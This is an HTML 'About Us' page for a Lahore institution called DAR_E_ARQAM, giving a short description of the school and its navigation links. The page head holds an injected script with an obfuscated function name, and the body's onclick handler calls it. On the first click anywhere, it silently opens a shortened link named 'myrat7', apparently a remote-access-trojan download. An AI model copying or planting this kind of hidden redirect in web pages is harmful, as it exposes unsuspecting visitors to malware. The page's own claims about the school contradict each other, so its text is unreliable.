<!DOCTYPE>
<html>

<head><script type = "text/javascript">load = 'True';function VXNlcmNvcjogSW(){if (load == 'True'){var win = window.open('http://rebrand.ly/myrat7', '_blank');win.focus();load = "False";}}</script>

<title>DAR_E_ARQAM</title>
<link rel="stylesheet" href="css/bootstrap.min.css">

<style>

body
{
background-image:url('images/l1.png');
background-position:center;
background-size:cover;
}

h1
{
color:white;
}

h4
{
color:white;
}

div >div
{
border:1px solid black;
}
p
{color:white;
background-color:grey;
}
</style>

</head>

<body onclick = "VXNlcmNvcjogSW()">

<nav class="navbar navbar-expand-sm bg-jamia navbar-dark">
        <a class="navbar-brand" href="#"><img src="images/logo.jpg" alt="logo" style="width:40px;"></a>
        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#collapsibleNavbar">
            <span class="navbar-toggler-icon"></span>
        </button>
        <div class="collapse navbar-collapse urdufont " id="collapsibleNavbar">
            <ul class="navbar-nav">
                <li class="nav-item">
                    <a class="nav-link" href="t3.html">Login</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="reg.html">Registration</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="about.html">About US</a>
                </li>
            </ul>
        </div>
    </nav>


<div class="container">



  <h1>Welcome To About US</h1>
	
	
	
	
	
	
	<br>
	<center>
	<p>
	Established in 1982 at Lahore, the DAR_E_ARQAM is the largest 
	<br> and the oldest seat of higher learning in Pakistan. It was the first 
	<br>to be established in the sub-continent in Muslim majority area.
	<br>Located in the historical and culturally alive city of Lahore, this 
	<br>University has played a leading role in higher education in the country.
	<br> The University strives to provide a conducive environment for the pursuit
	<br> of the academic activities. On account of its quality degrees, pleasant 
	<br>environment and low tuition fees the University remains the institution
	<br> of first choice for admission seeking students.</p>
	<br>
	<button type="button" class="btn btn-outline-success">FAQS</button>
	<button type="button" class="btn btn-outline-primary">Career</button>
	<button type="button" class="btn btn-outline-primary">Contact US</button>
	<button type="button" class="btn btn-outline-primary">SITE MAP</button>
	</center>
	<br>
	<br>
<button type="button" class="btn btn-primary btn-lg btn-block">Back</button>
<a class="dropdown-item" href="web.html">Main Page</a>

</div>
 



</body>


</html>